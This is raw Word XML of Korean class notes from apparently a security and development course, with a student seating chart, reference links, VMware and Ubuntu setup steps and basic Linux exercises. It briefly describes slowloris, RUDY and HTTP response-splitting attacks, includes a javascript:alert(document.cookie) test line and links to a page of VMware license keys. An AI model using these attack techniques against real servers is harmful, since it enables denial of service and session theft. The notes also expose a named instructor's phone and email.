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7yb61vdw4yc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박창렴</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr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  <w:t xml:space="preserve">오픈이지 이사 / myanjini@gmail.com / 010-2982-7033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algun Gothic" w:cs="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun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7oi77mg0e5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jmqrmcui6zn9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좌석배치</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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1.875"/>
        <w:gridCol w:w="1451.875"/>
        <w:gridCol w:w="1451.875"/>
        <w:gridCol w:w="1451.875"/>
        <w:gridCol w:w="1451.875"/>
        <w:gridCol w:w="1451.875"/>
        <w:gridCol w:w="1451.875"/>
        <w:gridCol w:w="1451.875"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1451.875"/>
            <w:gridCol w:w="1451.875"/>
            <w:gridCol w:w="1451.875"/>
            <w:gridCol w:w="1451.875"/>
            <w:gridCol w:w="1451.875"/>
            <w:gridCol w:w="1451.875"/>
            <w:gridCol w:w="1451.875"/>
            <w:gridCol w:w="1451.875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홍석범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권지용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임다래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김정래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연민호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이형봉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황상욱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김종수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김현우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최예은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김영조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정택진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유인국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나지용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김기홍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정백철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안동원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방혜찬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김태현</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="440" w:hRule="atLeast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스크린</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dbh2g65evel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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i7v3e2nojbar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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mu3304836x5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참고자료</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034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개발관련 참고자료를 얻을 수 있는 곳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MDN ⇒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https://developer.mozilla.org/ko/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생활코딩 ⇒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https://opentutorials.org/course/1/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개발보안 또는 시큐어코딩관련 자료를 얻을 수 있는 곳</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:spacing w:before="0" w:lineRule="auto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https://wiki.sei.cmu.edu/confluence/display/java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Rule="auto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http://www.kisa.or.kr/public/laws/laws3.jsp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fldChar w:fldCharType="begin"/>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.kisa.or.kr/public/laws/laws3_View.jsp?cPage=6&amp;mode=view&amp;p_No=259&amp;b_No=259&amp;d_No=88&amp;ST=T&amp;SV="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소프트웨어 개발 보안 가이드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"http://www.kisa.or.kr/public/laws/laws3_View.jsp?cPage=6&amp;mode=view&amp;p_No=259&amp;b_No=259&amp;d_No=55&amp;ST=T&amp;SV="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JAVA 시큐어코딩 가이드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"http://www.kisa.or.kr/public/laws/laws3_View.jsp?cPage=6&amp;mode=view&amp;p_No=259&amp;b_No=259&amp;d_No=54&amp;ST=T&amp;SV="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C 시큐어코딩 가이드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fldChar w:fldCharType="end"/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Android-JAVA 시큐어코딩 가이드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돈텝스코 블록체인 TED 강의 ⇒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ed.com/talks/don_tapscott_how_the_blockchain_is_changing_money_and_business/transcript?awesm=on.ted.com_8uhG&amp;utm_campaign=alain_de_botton_a_kinder_gentler_philosophy_of_success&amp;utm_content=ted.com-talkpage&amp;utm_medium=on.ted.com-twitter&amp;utm_source=direct-on.ted.com&amp;language=k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Klaytn 블록체인 어플리케이션 만들기 - 이론과 실습(6월 30일 기간한정 무료)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:spacing w:before="0" w:lineRule="auto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https://www.inflearn.com/course/%ED%81%B4%EB%A0%88%EC%9D%B4%ED%8A%BC/dashboard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자본주의 1부 - 돈은 빚이다. ⇒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http://www.ebs.co.kr/tv/show?prodId=348&amp;lectId=3121167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블록체인 개념서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블록체인 무엇인가?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http://www.yes24.com/Product/Goods/58551591?scode=032&amp;OzSrank=3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블록체인 혁명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http://www.yes24.com/Product/Goods/67567126?scode=032&amp;OzSrank=7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비트코인과 블록체인, 탐욕이 삼켜버린 기술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http://www.yes24.com/Product/Goods/58149507?scode=032&amp;OzSrank=5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블록체인 코어 (비트코인, 이더리움)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비트코인, 공개 블록체인 프로그래밍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http://www.yes24.com/Product/Goods/67090202?scode=032&amp;OzSrank=9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코어 이더리움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http://www.yes24.com/Product/Goods/59621522?scode=032&amp;OzSrank=1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이더리움 관련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Mastering Ethereum Git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https://github.com/ethereumbook/ethereumbook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블록체인 애플리케이션 개발 실전 입문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http://www.yes24.com/Product/Goods/57287123?scode=032&amp;OzSrank=31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하이퍼렛져 관련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하이퍼레저 블록체인 개발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http://www.yes24.com/Product/Goods/69279313?scode=032&amp;OzSrank=6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0" w:lineRule="auto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Rule="auto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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">온라인 강좌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before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Nanum Gothic Coding" w:cs="Nanum Gothic Coding" w:eastAsia="Nanum Gothic Coding" w:hAnsi="Nanum Gothic Coding"/>
          <w:b w:val="0"/>
          <w:color w:val="434343"/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https://lisk.io/academy/welcome-to-the-lisk-academy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0" w:lineRule="auto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https://www.youtube.com/user/cs50tv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Title"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dvrwd4k6j8hw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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_k2x3y4dqpig1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VirtualBox Network 종류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162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NAT(Network Address Translation)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1051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NAT Network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10515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Bridged Adapter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105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Internal Network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1051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Host-Only Adapter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1051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Generic Driver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거의 사용하지 않음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UDP Tunnel networking, VDE(Virtual Distributed Ethernet) 지원</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h0vgkwrinyu9" w:id="8"/>
      <w:bookmarkEnd w:id="8"/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ware 설치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80" w:lineRule="auto"/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"https://my.vmware.com/web/vmware/details?downloadGroup=WKST-1259-WIN&amp;productId=524&amp;rPId=20840"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https://my.vmware.com/web/vmware/details?downloadGroup=WKST-1259-WIN&amp;productId=524&amp;rPId=20840#product_downloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:spacing w:before="80" w:lineRule="auto"/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"https://dd00oo.tistory.com/entry/VMWare-12-key"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https://dd00oo.tistory.com/entry/VMWare-12-key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36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Rule="auto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설치파일 다운로드 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081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https://drive.google.com/file/d/1h6-XRsDivPQEILcPrK2rilzsuxR6blKZ/view?usp=sharing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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Title"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yzgxe0s2dwx1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강의</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3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https://www.youtube.com/watch?v=rhP5pseOJc0&amp;list=PLRx0vPvlEmdD5FLIdwTM4mKBgyjv4no81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정보처리기사</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088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정보보안기사 ⇒ </w:t>
      </w:r>
      <w:hyperlink r:id="rId3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https://kisq.or.kr/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CISA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A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CISSP ⇒ </w:t>
      </w:r>
      <w:hyperlink r:id="rId32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http://www.yes24.com/Product/Goods/19757966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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ifnz5m1icamf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 요청/응답 구조</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:rPr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7375650" cy="2184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정보보안개론 145페이지 참고</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kake98tthsd6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slowloris 공격 기법 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DoS 공격 기법 중 하나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요청 헤더의 끝이 개행문자로 끝나는 요청의 구조를 이용한 공격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before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId34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https://crefunx.tistory.com/search/slowloris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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9ycchx95nyj6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슬로 HTTP POST 공격 = RUDY 공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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요청 헤더의 Content-Length의 값을 크게 설정해서 서버가 요청 본문을 기다리도록 하는 공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId35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https://crefunx.tistory.com/35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89gvewfpxce9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 응답분할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외부입력값을 응답헤더에 값으로 사용하는 경우 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개행문자를 이용해서 응답을 여러개로 분할해 전달하고, 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분할된 응답 중 본문 영역에 악성행위를 하는 코드를 집어넣어서 공격하는 공격 기법</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E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0" w:lineRule="auto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Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Nanum Gothic Coding" w:cs="Nanum Gothic Coding" w:eastAsia="Nanum Gothic Coding" w:hAnsi="Nanum Gothic Coding"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_liu2ofbfovl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Title"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5vbp8n6gm41p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Ubuntu Desktop, Server, GNOME 버전 설치 (65~133페이지 참조)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
      <w:pPr>
        <w:spacing w:before="8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spacing w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3pm2gxl4upyf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Ubuntu 16.04 버전 다운로드</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
      <w:pPr>
        <w:spacing w:before="80" w:lineRule="auto"/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"http://old-releases.ubuntu.com/releases/"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http://old-releases.ubuntu.com/releases/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>
        <w:spacing w:before="80" w:lineRule="auto"/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"http://old-releases.ubuntu.com/releases/xenial/"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http://old-releases.ubuntu.com/releases/xenial/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A9">
      <w:pPr>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36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yuond4hi2y0h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 용으로 사용할 Ubuntu Desktop 16.04 LTS (64bit)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http://old-releases.ubuntu.com/releases/xenial/ubuntu-16.04-desktop-amd64.iso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5cjhcc4j2e5r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Server(B) 용으로 사용할 Ubuntu Desktop 16.04 LTS (64bit)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http://old-releases.ubuntu.com/releases/xenial/ubuntu-16.04-server-amd64.iso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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rzhejkicg3et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Client 용으로 사용할 Ubuntu GNOME 16.04 LTS (64bit)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http://cdimage.ubuntu.com/ubuntu-gnome/releases/16.04/release/ubuntu-gnome-16.04-desktop-amd64.iso</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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Title"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yxxlf0cls1w0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Title"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hmctxohciape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VMware Tools 설치</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6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VM &gt; Install VMware Tools 메뉴 클릭 &gt; CD-ROM 파일 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7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만약 Install VMware Tools 메뉴가 비활성되어 있지 않으면, CD-ROM  이미지로 아래 파일을 지정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8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C:\Program Files (x86)\VMware\VMware Workstation\linux.iso</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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mount ⇐ VMware Tools CD의 마운팅 경로를 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA">
      <w:pPr>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000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cd /media/root/VMware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\</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Toos ⇐ 설치 파일이 있는 디렉터리로 이동 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(\는 공백을 이스케이프 처리하는 문자)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB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cp *.gz /tmp ⇐ 설치 파일을 작업 디렉터리로 복사</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC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cd /tmp ⇐ 작업 디렉터리로 이동</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD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tar -xvf VMware[TAB]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE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cd vmare[TAB]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF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./vmware-install.pl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0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첫번째 질문에 yes를 입력하고 나머지는 엔터(디폴트로 설치)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1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# 끝나고 나면 reboot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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현재 브라우저에 전달된 쿠키를 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7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javascript:alert(document.cookie)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8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root@server:/# mount | grep hgfs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB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vmhgfs-fuse on /mnt/hgfs type fuse.vmhgfs-fuse (rw,nosuid,nodev,relatime,user_id=0,group_id=0,allow_other)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CC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5gvctflrl444" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">//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Server(B) 가상머신에 VMware Tools 설치 후 </w:t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x84temh11paw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udiq5owjj9ve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169~174페이지까지 실습을 진행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1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다음 명령어의 실행 결과가 나머지와 다른 것은?</w:t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root@server:/bin# ls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root@server:/bin# ls .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root@server:/bin# ls ./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root@server:/bin# ls /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root@server:/bin# ls /bin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root@server:/bin# ls /bin/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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root@server:/bin# ls /bin/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB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 사용자 홈 디렉터리로 이동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root@server:/bin/test# cd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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root@server:/bin/test# cd ~</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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root@server:/bin/test# cd $HOME</w:t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root@server:/bin/test# cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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touch aaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5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touch bbb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6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touch ccc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7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mkdir ddd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8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ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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aaa ⇐ 파일</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA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bbb ⇐ 파일</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB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ccc ⇐ 파일</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC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ddd ⇐ 디렉터리</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED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mv aaa bbb ccc ddd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE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ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF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ddd ⇐ aaa bbb ccc 파일이 사라진 것을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0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ls ./ddd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1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aaa  bbb  ccc ⇐ ddd 디렉터리에 aaa bbb ccc 파일이 옮겨진 것을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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date &gt; aaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6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cat aaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F7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2019. 05. 27. (월) 17:29:34 KST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8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date &gt; bbb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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cat bbb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA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2019. 05. 27. (월) 17:29:49 KST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB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cat all 명령어의 실행 결과가 아래와 같이 나오도록 all 파일을 생성해 보세요.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD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cat all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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2019. 05. 27. (월) 17:29:34 KST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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2019. 05. 27. (월) 17:29:49 KST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100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정답</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101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cat aaa bbb &gt; all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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root@server:/tmp# cat all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000103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2019. 05. 27. (월) 17:29:34 KST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104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2019. 05. 27. (월) 17:29:49 KST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105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183~187페이지 계정 및 그룹 관리 실습</w:t>
      </w:r>
    </w:p>
